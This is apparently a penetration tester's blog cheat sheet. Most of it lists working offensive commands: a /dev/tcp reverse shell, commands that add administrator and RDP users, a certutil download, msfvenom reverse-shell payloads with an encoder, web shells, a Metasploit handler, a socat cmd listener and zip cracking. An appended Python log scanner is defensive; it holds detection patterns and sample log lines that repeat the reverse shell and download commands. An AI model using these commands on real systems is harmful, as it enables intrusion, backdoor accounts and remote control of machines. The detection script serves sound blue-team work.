Cheat sheet of commonly used penetration testing commands and tricks

2018-06-30 11:18:36 Steven Xeldax

> A collection of the commands I use most often, for my own quick reference.

## Common Linux commands

* Find IP addresses in a file (the dot is escaped so only dotted quads match; an unescaped `.` would match any character)

```
grep '\([0-9]\{1,3\}\.\)\{3\}[0-9]\{1,3\}' file.txt
```

* The most basic reverse shell

```
/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/12345 0>&1 &
```

* Interactive shell via Python's pty module

```
python -c "import pty;pty.spawn('/bin/bash')"
```

* iptables transparent proxy (redirects inbound TCP on wlp4s0 to local port 8080)

```
iptables -t nat -A PREROUTING -i wlp4s0 -p tcp -j REDIRECT --to-port 8080
```

## Common Windows commands

* Add a user (the same command without `/add` sets the password of an existing user)

```
net user USERNAME PASSWORD /add
```

* Add a user to the local Administrators group

```
net localgroup administrators USERNAME /add
```

* List the members of the local Administrators group

```
net localgroup administrators
```

* Add a user to the Remote Desktop Users group

```
net localgroup "Remote Desktop Users" USERNAME /add
```

* Download a file (`%1` is the URL passed as the first batch-file argument)

```
certutil.exe -urlcache -split -f %1
```

* Export running processes and services with msinfo32

```
start /wait msinfo32.exe /report list.txt /categories swenv+SWEnvStartupTasks
```

* Export environment variables

```
start /wait msinfo32.exe /report startup.txt /categories swenv+SWEnvEnvVars
```

* Export startup program information

```
start /wait msinfo32.exe /report programs.txt /categories swenv+SWEnvStartupPrograms
```

* Enable RDP (port 3389)

On Windows Server 2003 it can be enabled from cmd:

```
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
```

On Windows 7 / Server 2008 / Server 2012:

```
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
```

Require Network Level Authentication on the RDP-Tcp listener:

```
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
```

Allow more than one session per user (clears the single-session restriction):

```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
```

## Common Metasploit commands

* Windows payload

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f exe -o /root/virus.exe -e x86/shikata_ga_nai -i 8
```

* Linux payload

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f elf -o /root/shell.elf
```

#### Web shells

* PHP payload

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f raw -o /root/shell.php
```

* ASP payload

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f asp -o a.asp
```

* JSP payload

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f raw -o shell.jsp
```

#### Script shells

* Python payload

```
msfvenom -p cmd/unix/reverse_python LHOST=x.x.x.x LPORT=xxxx -f raw -o shell.py
```

* Bash payload

```
msfvenom -p cmd/unix/reverse_bash LHOST=x.x.x.x LPORT=xxxx -f raw -o shell.sh
```

#### Metasploit handler

```
use exploit/multi/handler
set PAYLOAD <payloadname>
set LHOST <host>
set LPORT <port>
set ExitOnSession false
exploit -j -z
```

## Common MySQL statements

* Change a user's password (the `password` column exists in MySQL 5.6 and earlier)

```
mysql> use mysql;
mysql> update user set password=password('123') where user='root' and host='localhost';
mysql> flush privileges;
```

* Create a user and grant privileges

```
CREATE USER 'username'@'host' IDENTIFIED BY 'password';
GRANT privileges ON databasename.tablename TO 'username'@'host';
```

* Drop a user

```
DROP USER 'username'@'host';
```

## Other

* Brute-force a zip archive password

```
fcrackzip -b -u -l 1-5 00000014.zip
```

* socat listener that serves cmd on TCP port 23

```
socat tcp-listen:23 exec:cmd,pty,stderr
```
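The commands in the Linux, Windows and Metasploit sections above are also what a blue team looks for in command-line audit logs. The following Python script is an added example, not part of the original cheat sheet: it turns those commands into simple indicators, scans a log, and pulls the dotted-quad addresses out of flagged command lines with a stricter IPv4 matcher than the grep one-liner (literal dot, octet range check, no partial matches inside longer digit runs). The log record format (`<timestamp> <host> cmd=<command line>`), the host names and the 10.0.0.5 address are constructed for the example, and the indicator names are labels chosen here rather than any vendor's rule identifiers.

```python
import re
from dataclasses import dataclass, field

# Strict IPv4 matcher: literal dots, no adjacent digit or dot on either side
# (so "1.2.3.4.5" and "1234567" do not produce false hits), range-checked below.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def extract_ipv4(text):
    """Return the dotted-quad addresses in text whose octets are all 0..255."""
    return [m for m in IPV4_RE.findall(text)
            if all(int(octet) <= 255 for octet in m.split("."))]


# One regex per command family from the cheat sheet. The names are labels chosen
# for this example, not identifiers from any detection product.
INDICATORS = [
    ("bash_dev_tcp_reverse_shell", re.compile(r"/dev/tcp/")),
    ("python_pty_spawn", re.compile(r"pty\.spawn\(")),
    ("socat_exec_listener", re.compile(r"\bsocat\s+tcp-listen:\d+\s+exec:", re.I)),
    ("net_user_add", re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("net_localgroup_add", re.compile(
        r'\bnet\s+localgroup\s+(administrators|"remote desktop users")\s+\S+\s+/add\b', re.I)),
    ("certutil_urlcache_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("wmic_enable_rdp", re.compile(r"setallowtsconnections\s+1", re.I)),
    ("reg_multi_session_rdp", re.compile(r"fSingleSessionPerUser\b.*/d\s+0\b", re.I)),
    ("msfvenom_payload_build", re.compile(r"\bmsfvenom\b.*\s-p\s+\S+", re.I)),
]

# Constructed record format for this example: "<timestamp> <host> cmd=<command line>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+cmd=(?P<cmd>.*)$")


@dataclass
class Finding:
    line_no: int
    host: str
    indicator: str
    callback_ips: list = field(default_factory=list)


def scan(lines):
    """Match each record's command line against every indicator; any IPv4
    address inside a flagged command line is reported as a possible callback."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the constructed record format; skipped
        cmd = m.group("cmd")
        for name, rx in INDICATORS:
            if rx.search(cmd):
                findings.append(Finding(line_no, m.group("host"), name, extract_ipv4(cmd)))
    return findings


def summarize(findings):
    """Count findings per host so the noisiest host is triaged first."""
    counts = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


# Constructed sample log: the cheat sheet's commands mixed with benign activity.
SAMPLE_LOG = [
    "2018-06-30T11:18:36Z web01 cmd=/bin/bash -i >& /dev/tcp/10.0.0.5/12345 0>&1 &",
    "2018-06-30T11:19:02Z web01 cmd=python -c \"import pty;pty.spawn('/bin/bash')\"",
    "2018-06-30T11:20:15Z win-fs02 cmd=net user backup_svc P@ssw0rd /add",
    "2018-06-30T11:20:16Z win-fs02 cmd=net localgroup administrators backup_svc /add",
    "2018-06-30T11:21:40Z win-fs02 cmd=certutil.exe -urlcache -split -f http://10.0.0.5/a.exe a.exe",
    r'2018-06-30T11:22:01Z win-fs02 cmd=reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f',
    "2018-06-30T11:23:10Z win-fs02 cmd=socat tcp-listen:23 exec:cmd,pty,stderr",
    "2018-06-30T11:25:00Z web01 cmd=grep -c 1234567890 file.txt",
    "2018-06-30T11:26:00Z web01 cmd=ls -la /var/log",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} {f.host}: {f.indicator} ips={f.callback_ips}")
    print(summarize(scan(SAMPLE_LOG)))
```

On the sample, the two benign lines produce nothing, each of the other seven records triggers exactly one indicator, and the reverse shell and certutil records both surface 10.0.0.5 as the address to pivot on. In a real deployment the `LOG_RE` line would be swapped for the parser of whatever source carries process command lines (auditd `execve` records, Sysmon event 1, and so on) and the indicator list tuned to the environment, since `net user ... /add` alone is routine on a helpdesk host but not on a web server.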